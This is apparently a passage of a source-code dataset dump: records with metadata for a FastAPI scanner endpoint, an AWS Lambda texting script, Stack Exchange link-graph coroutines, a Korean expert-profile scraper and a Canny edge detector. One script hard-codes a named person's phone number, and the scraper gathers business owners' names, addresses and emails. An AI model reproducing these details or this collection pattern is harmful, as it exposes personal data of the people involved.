JSONResponse(status_code=status.HTTP_409_CONFLICT, content=output) else: if len(scanners) == 0: ls, scanners, scanners_set, scanner_name = get_scanner() if len(scanners) == 0: output = { "request_id": request_id, "output": False, "code": "NO_SCANNER", "msg": "There's no plugin scanners, check your cable", "time": time.time() - start_time } return JSONResponse(status_code=status.HTTP_422_UNPROCESSABLE_ENTITY, content=output) scanner_name = scanners[0] lock = True last_lock = time.time() try: image = ls.scan(scanner_name=scanner_name, return_type="based64") except Exception as ex: lock = False output = { "request_id": request_id, "error": "Scan Error", "code": "ERROR", "msg": "There's some error when scanner: {0}".format(traceback.format_exc()), "time": time.time() - start_time } ls, scanners, scanners_set, scanner_name = get_scanner() return JSONResponse(status_code=status.HTTP_500_INTERNAL_SERVER_ERROR, content=output) lock = False if image is False or image is None: output = { "request_id": request_id, "error": "Scan Error", "code": "ERROR", "msg": "There's some error when scanner, I doesn't know.", "time": time.time() - start_time } return JSONResponse(status_code=status.HTTP_500_INTERNAL_SERVER_ERROR, content=output) output = { "request_id": request_id, "output": image, "code": "SUCCESS", "msg": "SUCCESS", "time": time.time() - start_time } return JSONResponse(status_code=status.HTTP_200_OK, content=output)
4,343
0
89
575d58b5390a86bb5b50713c8330c07cdc1503d8
1,841
py
Python
TextClient.py
michaelxiao16/HackGT6
8ea6a16196fa8226792f0ec9c6e2d3e33513ce9e
[ "MIT" ]
null
null
null
TextClient.py
michaelxiao16/HackGT6
8ea6a16196fa8226792f0ec9c6e2d3e33513ce9e
[ "MIT" ]
null
null
null
TextClient.py
michaelxiao16/HackGT6
8ea6a16196fa8226792f0ec9c6e2d3e33513ce9e
[ "MIT" ]
null
null
null
import json import boto3 as boto3 DESTINATION_NUMBER = "4702637816" FIRST_NAME = "Austin" LAST_NAME = "Miles" if __name__ == '__main__': send_grade_change_message()
21.406977
38
0.611624
import json import boto3 as boto3 DESTINATION_NUMBER = "4702637816" FIRST_NAME = "Austin" LAST_NAME = "Miles" def send_grade_change_message(): payload3 = b"""{ "destinationNumber": "4702637816", "firstName": "Austin", "lastName": "Miles", "source": "Grade Change" }""" client = get_boto3_client() client.invoke( FunctionName="CanvasText", InvocationType="Event", Payload=payload3 ) def send_announcement_message(): payload3 = b"""{ "destinationNumber": "4702637816", "firstName": "Austin", "lastName": "Miles", "source": "New Announcement" }""" client = get_boto3_client() client.invoke( FunctionName="CanvasText", InvocationType="Event", Payload=payload3 ) def send_quiz_message(): payload3 = b"""{ "destinationNumber": "4702637816", "firstName": "Austin", "lastName": "Miles", "source": "New Quiz" }""" client = get_boto3_client() client.invoke( FunctionName="CanvasText", InvocationType="Event", Payload=payload3 ) def send_assignment_message(): payload3 = b"""{ "destinationNumber": "4702637816", "firstName": "Austin", "lastName": "Miles", "source": "New Assignment" }""" client = get_boto3_client() client.invoke( FunctionName="CanvasText", InvocationType="Event", Payload=payload3 ) def get_boto3_client(): with open('aws-creds.json') as f: creds = json.load(f) access_key = creds['access_key'] secret = creds['secret_key'] client = boto3.client( 'lambda', aws_access_key_id=access_key, aws_secret_access_key=secret, region_name='us-east-1' ) return client if __name__ == '__main__': send_grade_change_message()
1,548
0
115
01632dfbdb66922b0869d002c262c48492266f05
3,226
py
Python
src/stack_exchange_graph_data/coroutines/links.py
Peilonrayz/stack_exchange_graph_data
d2d8d9f80dba727509f98b31d25e20e1e3824bb3
[ "MIT" ]
null
null
null
src/stack_exchange_graph_data/coroutines/links.py
Peilonrayz/stack_exchange_graph_data
d2d8d9f80dba727509f98b31d25e20e1e3824bb3
[ "MIT" ]
null
null
null
src/stack_exchange_graph_data/coroutines/links.py
Peilonrayz/stack_exchange_graph_data
d2d8d9f80dba727509f98b31d25e20e1e3824bb3
[ "MIT" ]
null
null
null
"""Link coroutine control flow functions.""" import argparse import collections import urllib.parse from typing import DefaultDict, Generator, List, Set from ..helpers.coroutines import coroutine from ..segd import graph @coroutine def handle_links(filter_: Generator, good: Generator) -> Generator: """Send http and id links to correct target.""" while True: orig_id, link, link_type = yield target = filter_ if isinstance(link, str) else good target.send((orig_id, link, link_type)) @coroutine def filter_links(domains: Set[str], target: Generator) -> Generator: """Filter links to links to posts on the provided site.""" while True: orig_id, link, link_type = yield url = urllib.parse.urlparse(link) if url.netloc not in domains: continue segments: List[str] = url.path.split("/") list_ = segments[1] if len(segments) >= 2 else None post_id = segments[2] if len(segments) >= 3 else "" if list_ not in {"questions", "a", "q"}: continue if url.query: try: _, post_id = url.query.split("_", 1) int(post_id) except ValueError: pass try: int(post_id) except (ValueError, TypeError): continue target.send((orig_id, post_id, link_type)) @coroutine def filter_duplicates(target: Generator) -> Generator: """Remove duplicate links from the output.""" link_lookup: DefaultDict[int, DefaultDict[int, Set[graph.LinkType]]] link_lookup = collections.defaultdict(lambda: collections.defaultdict(set)) try: while True: from_node, to_node, link_type = yield link_lookup[from_node][to_node].add(link_type) finally: for from_node, links_to in link_lookup.items(): for to_node, types in links_to.items(): target.send( (from_node, to_node, max(types, key=lambda i: i.value.weight),) ) @coroutine def filter_network_size(arguments: argparse.Namespace, target: Generator,) -> Generator: """ Filter networks that aren't the wanted size. :param arguments: CLI parser arguments that dictate the min and max size. """ graph_ = graph.Graph() try: while True: item = yield graph_.add(*item) finally: for network in graph_.get_networks(): if not arguments.min <= len(network) <= arguments.max: continue for node in network: for link in node.links: edge_type = link.type.value target.send( ( node.value, link.target.value, edge_type.weight, edge_type.type, ) ) @coroutine def sheet_prep(target: Generator) -> Generator: """Convert into the format required to be sent to disk.""" target.send("Source;Target;Weight;Type\n") while True: edge = yield target.send(";".join(map(str, edge)) + "\n")
31.019231
88
0.574706
"""Link coroutine control flow functions.""" import argparse import collections import urllib.parse from typing import DefaultDict, Generator, List, Set from ..helpers.coroutines import coroutine from ..segd import graph @coroutine def handle_links(filter_: Generator, good: Generator) -> Generator: """Send http and id links to correct target.""" while True: orig_id, link, link_type = yield target = filter_ if isinstance(link, str) else good target.send((orig_id, link, link_type)) @coroutine def filter_links(domains: Set[str], target: Generator) -> Generator: """Filter links to links to posts on the provided site.""" while True: orig_id, link, link_type = yield url = urllib.parse.urlparse(link) if url.netloc not in domains: continue segments: List[str] = url.path.split("/") list_ = segments[1] if len(segments) >= 2 else None post_id = segments[2] if len(segments) >= 3 else "" if list_ not in {"questions", "a", "q"}: continue if url.query: try: _, post_id = url.query.split("_", 1) int(post_id) except ValueError: pass try: int(post_id) except (ValueError, TypeError): continue target.send((orig_id, post_id, link_type)) @coroutine def filter_duplicates(target: Generator) -> Generator: """Remove duplicate links from the output.""" link_lookup: DefaultDict[int, DefaultDict[int, Set[graph.LinkType]]] link_lookup = collections.defaultdict(lambda: collections.defaultdict(set)) try: while True: from_node, to_node, link_type = yield link_lookup[from_node][to_node].add(link_type) finally: for from_node, links_to in link_lookup.items(): for to_node, types in links_to.items(): target.send( (from_node, to_node, max(types, key=lambda i: i.value.weight),) ) @coroutine def filter_network_size(arguments: argparse.Namespace, target: Generator,) -> Generator: """ Filter networks that aren't the wanted size. :param arguments: CLI parser arguments that dictate the min and max size. """ graph_ = graph.Graph() try: while True: item = yield graph_.add(*item) finally: for network in graph_.get_networks(): if not arguments.min <= len(network) <= arguments.max: continue for node in network: for link in node.links: edge_type = link.type.value target.send( ( node.value, link.target.value, edge_type.weight, edge_type.type, ) ) @coroutine def sheet_prep(target: Generator) -> Generator: """Convert into the format required to be sent to disk.""" target.send("Source;Target;Weight;Type\n") while True: edge = yield target.send(";".join(map(str, edge)) + "\n")
0
0
0
68b34ecd7f5ec5322690ac437666c06998f402ae
11,621
py
Python
Project01/Final/profile_data_extraction.py
nayeem990/Korean-website-scraping
fd26c913bec3a2ba27ca9e8413a9e92bfc618f85
[ "Apache-2.0" ]
null
null
null
Project01/Final/profile_data_extraction.py
nayeem990/Korean-website-scraping
fd26c913bec3a2ba27ca9e8413a9e92bfc618f85
[ "Apache-2.0" ]
null
null
null
Project01/Final/profile_data_extraction.py
nayeem990/Korean-website-scraping
fd26c913bec3a2ba27ca9e8413a9e92bfc618f85
[ "Apache-2.0" ]
null
null
null
# importing the required modules import requests from bs4 import BeautifulSoup import pandas as pd from selenium import webdriver import time pd.options.display.max_columns = 999 pd.options.display.max_rows = 999 df = pd.read_csv('new_profile_links.csv') df = df.drop(['Unnamed: 0'], axis = 1) df["0"] pl = list(df["0"]) all_user = [] for i in range(len(pl)): try: one_user = [] print("Loop :",i) url = pl[i] print(url) driver = webdriver.Chrome(r'C:\Users\David\chromedriver_win32\chromedriver.exe') driver.get(url) time.sleep(3) # basic data extraction basic = [] source_code = driver.page_source soup = BeautifulSoup(source_code, 'html.parser') name = soup.find_all('strong', class_ = 'userName--1ZA07') for n in name: basic.append(n.text) sp = soup.find_all('div', class_ = 'categoryName--1zWtA') category = soup.find_all('strong', class_ = 'introCategory--F81Ky') for e in category: basic.append(e.text) sp = soup.find_all('div', class_ = 'categoryName--1zWtA') for m in sp: basic.append(m.text) rating = soup.find_all('div', class_ = 'itemRating--360UA itemRating--2-rFv typeLarge--1cEMN') for k in rating: a = k.text if "평균 평점" in a: a = a.replace("평균 평점", "") basic.append(a) ### Project data for one user maininfo = [] infos = soup.find_all('ul', class_ = 'productInfoList--1-H-D') for f in infos: li = f.find_all('li') for ll in li: uh = ["대표자","상호명","사업자등록번호","통신판매업번호-", "사업장 주소", "고객센터",'메일'] for u in range(len(uh)): if uh[u] in ll.text: b = uh[u] la = ll.text maininfo.append(la.replace(b , "")) #count product and review section products = [] tt = soup.find_all('div', class_ = "list--e6w5E") for t in tt: cc = t.find_all('div', class_='count--2w5o6') for cd in cc: cd.find_all('div', class_ = "count--2w5o6") ce = cd.text products.append(ce) #profile informations profile = [] heading = soup.find_all('strong', class_ = 'introduceMainTitle--2MZc-') for h in heading: profile.append(h.text) text = soup.find_all('p', class_ = 'introduceText--2R5pY') for e in text: profile.append(e.text) #new section recom = soup.find_all('ul', class_ = 'listDisc--1Cc80') for rc in recom: profile.append(rc.text) rest = soup.find_all('div', class_ = ['profileCareer--3_uFh','isExpert--2GkDA']) # for mm in rest: # mm.find_all('div', class_ = 'profileBox--1jlog') for m in rest: m.find_all('div', class_ = "careerJob--2-hX4") for i in m: profile.append(i.text) ### Project data for one user projects = soup.find_all('div', class_ = 'listArea--peDdh') #projects and consultations all_project = [] for y in projects: one = [] yy = y.find_all('div', class_ = 'item--1ZJSx') for t in yy: project_item = [] tdiv = t.find_all('div', class_ =['itemTitle--2vWBq','elip2--nFWXY']) for td in tdiv: project_title = td.text project_item.append(project_title) ratdiv = t.find_all('div', class_ =['itemGroup--2RnIL','ItemGroup_itemGroup--1f-on']) for rd in ratdiv: ratscore = rd.find_all("div", class_ = "itemRating--360UA") for r in ratscore: b = r.text if "평균 평점" in b: b = b.replace("평균 평점", " ") project_item.append(b) ratreview = rd.find_all("div", class_ = "itemCount--2HsJv") for rr in ratreview: c = rr.text if "후기" in c: c = c.replace("후기", " ") project_item.append(c) feediv = t.find_all('span', class_ =['priceInner--1HE2v']) for fd in feediv: fee = fd.find_all("span", class_=["priceNum--1rXJI","ItemPrice_priceNum--2OFHI"]) for f in fee: project_item.append(f.text) discount = fd.find_all("em", class_="discountPercent--3n0bl") for dis in discount: project_item.append(dis.text) actualPrize = fd.find_all("span", class_="beforeDiscount--W1C4G") for fp in actualPrize: project_item.append(fp.text) one.append([*project_item]) all_project.append([*one]) proj = [] for i in range(len(all_project)): data = all_project[i] for j in range(len(data)): dj = data[j] for k in range(len(dj)): bb = dj[k] proj.append(bb) lis = ["평균 평점","후기","판매가","원할인률","할인 전 가격", "할인률"] for i in range(len(proj)): for j in range(len(lis)): if lis[j] in proj[i]: proj[i] = proj[i].replace(lis[j], " ") rdiv = soup.find_all('div', class_ = "listSection--kViCl") reviews_user = [] reviews_rating = [] reviews_heading = [] reviews_text = [] for eachr in rdiv: ee = eachr.find_all('div', class_ = "reviewItem--1OwNO") for each in ee: name = each.find_all('span', class_ = ["item--3sQA9 ","nickname--2OOe6"]) for nm in name: reviews_user.append(nm.text) rating = each.find_all('div', class_ = ["expertPoint--2Zrvr","expertPoint--13H3V"]) for r in rating: b = r.text if "평점" in b: b = b.replace("평점", "") reviews_rating.append(b) head = each.find_all('div', class_ = "reviewTitle--qv3Pk") for r in head: reviews_heading.append(r.text) commentdiv = each.find_all('p', class_ = "reviewText--28mzN") for ecom in commentdiv: reviews_text.append(ecom.text) review_obj = [] for i in range(len(reviews_user)): review_obj.append(reviews_user[i]) review_obj.append(reviews_heading[i]) review_obj.append(reviews_rating[i]) review_obj.append(reviews_text[i]) #final works all_user.append([url,*basic, *maininfo, *profile, *products, *review_obj ,*proj]) driver.quit() except : driver.quit() print("Error") try: df = pd.DataFrame(all_user) main = [] for index, row in df.iterrows(): if row[3] in ['법률','노동/노무','지식재산/특허',"등기/공탁/법무",'민원/행정']: main.append("법률") elif row[3] in ['세금/세무','회계/감사','통관/관세','온라인 마케팅','온라인쇼핑몰','엑스퍼트 사업','경영/기술컨설팅','유통관리','가맹점창업','건축','번역/통역','날씨컨설팅','원가 분석']: main.append('비즈니스',) elif row[3] in ['자산컨설팅','부동산 상담','손해사정','신용상담','감정평가']: main.append("금융/재테크") elif row[3] in ['심리상담','영양/다이어트','MBTI ']: main.append("건강") elif row[3] in ['운세/사주','타로카드','작명','꿈해몽','관상','풍수']: main.append("운세") elif row[3] in ['펫 관리','연애','육아','명상','패션/스타일','뷰티','요리/홈쿠킹','커피/주류','인테리어','청소/세탁','교통사고 분석','자동차수리']: main.append("생활") elif row[3] in ['음악/악기','미술/디자인','공예/공방','무용/ 발레','사진','실용/방송댄스','뮤지컬/공연','낚시','원예/홈가드닝','여행','글쓰기/논술']: main.append("취미") elif row[3] in ['외국어학습','입시/진학','해외유학','대학교학습','고등학교학습','중학교학습','초등학교학습']: main.append( '교육/학습') elif row[3] in ['피트니스','골프','필라테스','요가','생활스포츠','자전거','수상 스포츠','동계 스포츠','유아체육']: main.append('운동/스포츠') elif row[3] in ['게임하우투','IT노하우','코딩','오피스문서','동영상 제작']: main.append('IT/컨텐츠') elif row[3] in ['라이프 코칭','취업','자기PR','공무원시험 ','자격증시험']: main.append('자기계발') else: main.append('네이버고객센터') df.insert(3, "main_category", main) df.to_csv("DATA.csv") except: print("Error occured during data load to pd df") # ######################################### Project data section ######################################## # ## Project data for one user # projects = soup.find_all('div', class_ = 'listArea--peDdh') # #projects and consultations # one = [] # for y in projects: # yy = y.find_all('div', class_ = 'item--1ZJSx') # for t in yy: # project_item = [] # adiv = t.find_all('a', class_ =['itemCard--2Whvq','ItemSmallThumbnail_itemCard--196nY','productCard--1WjeX']) # for div in adiv: # eachdiv = div.find_all('div', class_ =['itemLink--2ljnw']) # for e in eachdiv: # ed = e.find_all('div', class_ =['itemBox--3y657']) # for each in ed: # ee = each.find_all('div', class_ =['itemInfo--24tcX']) # for eee in ee: # title = eee.find_all('div', class_ =['itemTitle--2vWBq','elip2--nFWXY']) # for t in title: # project_item.append([t.text]) # title = project_item[0][0] # print(title) # project_item.append(project_title) # ratdiv = t.find_all('div', class_ =['itemGroup--2RnIL','ItemGroup_itemGroup--1f-on']) # for rd in ratdiv: # each = rd.find_all('div') # for e in each: # project_item.append(e) # feediv = t.find_all('div', class_ = ['itemPrice--cscFn','ItemPrice_itemPrice--1dTfW','alignCenter--2NQfI']) # for fd in feediv: # fee = fd.find_all("span", class_ = ['priceNum--1rXJI','ItemPrice_priceNum--2OFHI']) # for f in fee: # project_item.append(f.text) # one.append([*project_item]) # all_project.append(one) # p = [] # for i in range(len(all_project)): # data = all_project[i] # for j in range(len(data)): # dj = data[j] # for k in range(len(dj)): # bb = dj[k] # p.append(bb)
33.586705
133
0.45435
# importing the required modules import requests from bs4 import BeautifulSoup import pandas as pd from selenium import webdriver import time pd.options.display.max_columns = 999 pd.options.display.max_rows = 999 df = pd.read_csv('new_profile_links.csv') df = df.drop(['Unnamed: 0'], axis = 1) df["0"] pl = list(df["0"]) all_user = [] for i in range(len(pl)): try: one_user = [] print("Loop :",i) url = pl[i] print(url) driver = webdriver.Chrome(r'C:\Users\David\chromedriver_win32\chromedriver.exe') driver.get(url) time.sleep(3) # basic data extraction basic = [] source_code = driver.page_source soup = BeautifulSoup(source_code, 'html.parser') name = soup.find_all('strong', class_ = 'userName--1ZA07') for n in name: basic.append(n.text) sp = soup.find_all('div', class_ = 'categoryName--1zWtA') category = soup.find_all('strong', class_ = 'introCategory--F81Ky') for e in category: basic.append(e.text) sp = soup.find_all('div', class_ = 'categoryName--1zWtA') for m in sp: basic.append(m.text) rating = soup.find_all('div', class_ = 'itemRating--360UA itemRating--2-rFv typeLarge--1cEMN') for k in rating: a = k.text if "평균 평점" in a: a = a.replace("평균 평점", "") basic.append(a) ### Project data for one user maininfo = [] infos = soup.find_all('ul', class_ = 'productInfoList--1-H-D') for f in infos: li = f.find_all('li') for ll in li: uh = ["대표자","상호명","사업자등록번호","통신판매업번호-", "사업장 주소", "고객센터",'메일'] for u in range(len(uh)): if uh[u] in ll.text: b = uh[u] la = ll.text maininfo.append(la.replace(b , "")) #count product and review section products = [] tt = soup.find_all('div', class_ = "list--e6w5E") for t in tt: cc = t.find_all('div', class_='count--2w5o6') for cd in cc: cd.find_all('div', class_ = "count--2w5o6") ce = cd.text products.append(ce) #profile informations profile = [] heading = soup.find_all('strong', class_ = 'introduceMainTitle--2MZc-') for h in heading: profile.append(h.text) text = soup.find_all('p', class_ = 'introduceText--2R5pY') for e in text: profile.append(e.text) #new section recom = soup.find_all('ul', class_ = 'listDisc--1Cc80') for rc in recom: profile.append(rc.text) rest = soup.find_all('div', class_ = ['profileCareer--3_uFh','isExpert--2GkDA']) # for mm in rest: # mm.find_all('div', class_ = 'profileBox--1jlog') for m in rest: m.find_all('div', class_ = "careerJob--2-hX4") for i in m: profile.append(i.text) ### Project data for one user projects = soup.find_all('div', class_ = 'listArea--peDdh') #projects and consultations all_project = [] for y in projects: one = [] yy = y.find_all('div', class_ = 'item--1ZJSx') for t in yy: project_item = [] tdiv = t.find_all('div', class_ =['itemTitle--2vWBq','elip2--nFWXY']) for td in tdiv: project_title = td.text project_item.append(project_title) ratdiv = t.find_all('div', class_ =['itemGroup--2RnIL','ItemGroup_itemGroup--1f-on']) for rd in ratdiv: ratscore = rd.find_all("div", class_ = "itemRating--360UA") for r in ratscore: b = r.text if "평균 평점" in b: b = b.replace("평균 평점", " ") project_item.append(b) ratreview = rd.find_all("div", class_ = "itemCount--2HsJv") for rr in ratreview: c = rr.text if "후기" in c: c = c.replace("후기", " ") project_item.append(c) feediv = t.find_all('span', class_ =['priceInner--1HE2v']) for fd in feediv: fee = fd.find_all("span", class_=["priceNum--1rXJI","ItemPrice_priceNum--2OFHI"]) for f in fee: project_item.append(f.text) discount = fd.find_all("em", class_="discountPercent--3n0bl") for dis in discount: project_item.append(dis.text) actualPrize = fd.find_all("span", class_="beforeDiscount--W1C4G") for fp in actualPrize: project_item.append(fp.text) one.append([*project_item]) all_project.append([*one]) proj = [] for i in range(len(all_project)): data = all_project[i] for j in range(len(data)): dj = data[j] for k in range(len(dj)): bb = dj[k] proj.append(bb) lis = ["평균 평점","후기","판매가","원할인률","할인 전 가격", "할인률"] for i in range(len(proj)): for j in range(len(lis)): if lis[j] in proj[i]: proj[i] = proj[i].replace(lis[j], " ") rdiv = soup.find_all('div', class_ = "listSection--kViCl") reviews_user = [] reviews_rating = [] reviews_heading = [] reviews_text = [] for eachr in rdiv: ee = eachr.find_all('div', class_ = "reviewItem--1OwNO") for each in ee: name = each.find_all('span', class_ = ["item--3sQA9 ","nickname--2OOe6"]) for nm in name: reviews_user.append(nm.text) rating = each.find_all('div', class_ = ["expertPoint--2Zrvr","expertPoint--13H3V"]) for r in rating: b = r.text if "평점" in b: b = b.replace("평점", "") reviews_rating.append(b) head = each.find_all('div', class_ = "reviewTitle--qv3Pk") for r in head: reviews_heading.append(r.text) commentdiv = each.find_all('p', class_ = "reviewText--28mzN") for ecom in commentdiv: reviews_text.append(ecom.text) review_obj = [] for i in range(len(reviews_user)): review_obj.append(reviews_user[i]) review_obj.append(reviews_heading[i]) review_obj.append(reviews_rating[i]) review_obj.append(reviews_text[i]) #final works all_user.append([url,*basic, *maininfo, *profile, *products, *review_obj ,*proj]) driver.quit() except : driver.quit() print("Error") try: df = pd.DataFrame(all_user) main = [] for index, row in df.iterrows(): if row[3] in ['법률','노동/노무','지식재산/특허',"등기/공탁/법무",'민원/행정']: main.append("법률") elif row[3] in ['세금/세무','회계/감사','통관/관세','온라인 마케팅','온라인쇼핑몰','엑스퍼트 사업','경영/기술컨설팅','유통관리','가맹점창업','건축','번역/통역','날씨컨설팅','원가 분석']: main.append('비즈니스',) elif row[3] in ['자산컨설팅','부동산 상담','손해사정','신용상담','감정평가']: main.append("금융/재테크") elif row[3] in ['심리상담','영양/다이어트','MBTI ']: main.append("건강") elif row[3] in ['운세/사주','타로카드','작명','꿈해몽','관상','풍수']: main.append("운세") elif row[3] in ['펫 관리','연애','육아','명상','패션/스타일','뷰티','요리/홈쿠킹','커피/주류','인테리어','청소/세탁','교통사고 분석','자동차수리']: main.append("생활") elif row[3] in ['음악/악기','미술/디자인','공예/공방','무용/ 발레','사진','실용/방송댄스','뮤지컬/공연','낚시','원예/홈가드닝','여행','글쓰기/논술']: main.append("취미") elif row[3] in ['외국어학습','입시/진학','해외유학','대학교학습','고등학교학습','중학교학습','초등학교학습']: main.append( '교육/학습') elif row[3] in ['피트니스','골프','필라테스','요가','생활스포츠','자전거','수상 스포츠','동계 스포츠','유아체육']: main.append('운동/스포츠') elif row[3] in ['게임하우투','IT노하우','코딩','오피스문서','동영상 제작']: main.append('IT/컨텐츠') elif row[3] in ['라이프 코칭','취업','자기PR','공무원시험 ','자격증시험']: main.append('자기계발') else: main.append('네이버고객센터') df.insert(3, "main_category", main) df.to_csv("DATA.csv") except: print("Error occured during data load to pd df") # ######################################### Project data section ######################################## # ## Project data for one user # projects = soup.find_all('div', class_ = 'listArea--peDdh') # #projects and consultations # one = [] # for y in projects: # yy = y.find_all('div', class_ = 'item--1ZJSx') # for t in yy: # project_item = [] # adiv = t.find_all('a', class_ =['itemCard--2Whvq','ItemSmallThumbnail_itemCard--196nY','productCard--1WjeX']) # for div in adiv: # eachdiv = div.find_all('div', class_ =['itemLink--2ljnw']) # for e in eachdiv: # ed = e.find_all('div', class_ =['itemBox--3y657']) # for each in ed: # ee = each.find_all('div', class_ =['itemInfo--24tcX']) # for eee in ee: # title = eee.find_all('div', class_ =['itemTitle--2vWBq','elip2--nFWXY']) # for t in title: # project_item.append([t.text]) # title = project_item[0][0] # print(title) # project_item.append(project_title) # ratdiv = t.find_all('div', class_ =['itemGroup--2RnIL','ItemGroup_itemGroup--1f-on']) # for rd in ratdiv: # each = rd.find_all('div') # for e in each: # project_item.append(e) # feediv = t.find_all('div', class_ = ['itemPrice--cscFn','ItemPrice_itemPrice--1dTfW','alignCenter--2NQfI']) # for fd in feediv: # fee = fd.find_all("span", class_ = ['priceNum--1rXJI','ItemPrice_priceNum--2OFHI']) # for f in fee: # project_item.append(f.text) # one.append([*project_item]) # all_project.append(one) # p = [] # for i in range(len(all_project)): # data = all_project[i] # for j in range(len(data)): # dj = data[j] # for k in range(len(dj)): # bb = dj[k] # p.append(bb)
0
0
0
19fc44400262a2a3e22b403b44260ab7e740721d
6,183
py
Python
augmentation/edge_detection/canny_edge.py
mnguyen0226/image-augmentation-dnn-performance
793b0e513a6984d13e5ae33e1dd74fb8c45556fd
[ "MIT" ]
null
null
null
augmentation/edge_detection/canny_edge.py
mnguyen0226/image-augmentation-dnn-performance
793b0e513a6984d13e5ae33e1dd74fb8c45556fd
[ "MIT" ]
null
null
null
augmentation/edge_detection/canny_edge.py
mnguyen0226/image-augmentation-dnn-performance
793b0e513a6984d13e5ae33e1dd74fb8c45556fd
[ "MIT" ]
null
null
null
import math import cv2 as cv import numpy as np from scipy.ndimage.filters import convolve from scipy import ndimage from matplotlib import pyplot as plt import matplotlib.image as mpimg def get_sobel_kernel(im): """Takes in smoothed images then do matrix multiplication with Sobel kernel to get the gradient magnitude and angle Parameters ---------- im input image Returns ------- gradient gradient magnitude of sobel filter theta the angle of sobel filter """ kernel_x = np.array([[-1, 0, 1], [-2, 0, 2], [-1, 0, 1]], np.float32) kernel_y = np.array([[1, 2, 1], [0, 0, 0], [-1, -2, -1]], np.float32) image_x = ndimage.filters.convolve(im, kernel_x) image_y = ndimage.filters.convolve(im, kernel_y) gradient = np.hypot(image_x, image_y) gradient = gradient / gradient.max() * 255 theta = np.arctan2(image_y, image_x) return (gradient, theta) def non_max_supression(grad_im, theta): """Goes thru all points on the gradient intensity matrix to finds the pixels with the max value in the edge directions Parameters ---------- grad_im gradient magnitude from sobel filter theta angle from sobel filter Returns ------- out_im output image """ row, col = grad_im.shape # M, N out_im = np.zeros((row, col), dtype=np.int32) angle = theta*180. / np.pi angle[angle < 0] += 180 for i in range(1,row-1): for j in range(1,col-1): q = 255 r = 255 # for angle 0 if (0 <= angle[i,j] < 22.5) or (157.5 <= angle[i,j] <= 180): q = grad_im[i, j+1] r = grad_im[i, j-1] # for angle 45 elif (22.5 <= angle[i,j] < 67.5): q = grad_im[i+1, j-1] r = grad_im[i-1, j+1] # for angle 90 elif (67.5 <= angle[i,j] < 112.5): q = grad_im[i+1, j] r = grad_im[i-1, j] # for angle 135 elif (112.5 <= angle[i,j] < 157.5): q = grad_im[i-1, j-1] r = grad_im[i+1, j+1] if (grad_im[i,j] >= q) and (grad_im[i,j] >= r): out_im[i,j] = grad_im[i,j] else: out_im[i,j] = 0 return out_im def double_threshold(im, ltr, htr): """Double threshold aim to identify strong, weak, and non-relevant pixels Parameters ---------- im input image ltr low threshold ratio htr high threshold ratio Returns ------- weak weak pixel that has intensity value that is not enough to be considered strong ones, but not non-relevant strong pixel with very high intensity res non-relevant pixel, not high, not low """ high_thres = im.max() * htr low_thres = high_thres * ltr row, col = im.shape res = np.zeros((row,col), dtype=np.int32) weak = np.int32(25) strong = np.int32(255) strong_i, strong_j = np.where(im >= high_thres) zeros_i, zeros_j = np.where(im < low_thres) weak_i, weak_j = np.where((im <= high_thres) & (im >= low_thres)) res[strong_i, strong_j] = strong res[weak_i, weak_j] = weak return (res, weak, strong) def hysteresis(im, weak, strong=255): """Transforms weak pixel into strong ones if at least 1 pixel around the one being processed is a strong one Parameters ---------- im input image weak weak pixel that has intensity value that is not enough to be considered strong ones, but not non-relevant strong pixel with very high intensity Returns ------- im output result image """ row, col = im.shape for i in range(1, row-1): for j in range(1, col-1): if (im[i,j] == weak): if ((im[i+1, j-1] == strong) or (im[i+1, j] == strong) or (im[i+1, j+1] == strong) or (im[i, j-1] == strong) or (im[i, j+1] == strong) or (im[i-1, j-1] == strong) or (im[i-1, j] == strong) or (im[i-1, j+1] == strong)): im[i, j] = strong else: im[i, j] = 0 return im def rgb2gray(rgb): """Transform 3 colors channels image to grayscale Parameters ---------- rgb input image rgb Returns ------- np.dot grayscale image """ return np.dot(rgb[...,:3], [0.2989, 0.5870, 0.1140]) def canny(origin_img): """Applies Canny Edge Detection Steps Parameters ---------- origin_img input original image Returns ------- im_final final output edge-detected image """ origin_img = rgb2gray(origin_img) origin_img = origin_img/255.0 # blur image with Gaussian filter with sigma = 2,8,16 filtered_im1 = cv.GaussianBlur(origin_img, (0,0), 2) filtered_im2 = cv.GaussianBlur(origin_img, (0,0), 8) filtered_im3 = cv.GaussianBlur(origin_img, (0,0), 16) # apply Canny edge detectors with the scales you choose to detect edges grad_mag1, angle1 = get_sobel_kernel(filtered_im1) grad_mag2, angle2 = get_sobel_kernel(filtered_im2) grad_mag3, angle3 = get_sobel_kernel(filtered_im3) # apply non-max-suppression im_nms1 = non_max_supression(grad_mag1, angle1) im_nms2 = non_max_supression(grad_mag2, angle2) im_nms3 = non_max_supression(grad_mag3, angle3) im_thres1, weak1, strong1 = double_threshold(im_nms1, ltr=0.07, htr=0.19) im_thres2, weak2, strong2 = double_threshold(im_nms2, ltr=0.07, htr=0.19) im_thres3, weak3, strong3 = double_threshold(im_nms3, ltr=0.07, htr=0.19) im_hys1 = hysteresis(im_thres1, weak1, strong1) im_hys2 = hysteresis(im_thres2, weak2, strong2) im_hys3 = hysteresis(im_thres3, weak3, strong3) im_final = im_hys1 + im_hys2 + im_hys3 im_final = im_final/3.0 # convert two 3 dim if (im_final.ndim == 2): im_final = np.expand_dims(im_final, axis = 2) return im_final
27.602679
122
0.569303
import math import cv2 as cv import numpy as np from scipy.ndimage.filters import convolve from scipy import ndimage from matplotlib import pyplot as plt import matplotlib.image as mpimg def get_sobel_kernel(im): """Takes in smoothed images then do matrix multiplication with Sobel kernel to get the gradient magnitude and angle Parameters ---------- im input image Returns ------- gradient gradient magnitude of sobel filter theta the angle of sobel filter """ kernel_x = np.array([[-1, 0, 1], [-2, 0, 2], [-1, 0, 1]], np.float32) kernel_y = np.array([[1, 2, 1], [0, 0, 0], [-1, -2, -1]], np.float32) image_x = ndimage.filters.convolve(im, kernel_x) image_y = ndimage.filters.convolve(im, kernel_y) gradient = np.hypot(image_x, image_y) gradient = gradient / gradient.max() * 255 theta = np.arctan2(image_y, image_x) return (gradient, theta) def non_max_supression(grad_im, theta): """Goes thru all points on the gradient intensity matrix to finds the pixels with the max value in the edge directions Parameters ---------- grad_im gradient magnitude from sobel filter theta angle from sobel filter Returns ------- out_im output image """ row, col = grad_im.shape # M, N out_im = np.zeros((row, col), dtype=np.int32) angle = theta*180. / np.pi angle[angle < 0] += 180 for i in range(1,row-1): for j in range(1,col-1): q = 255 r = 255 # for angle 0 if (0 <= angle[i,j] < 22.5) or (157.5 <= angle[i,j] <= 180): q = grad_im[i, j+1] r = grad_im[i, j-1] # for 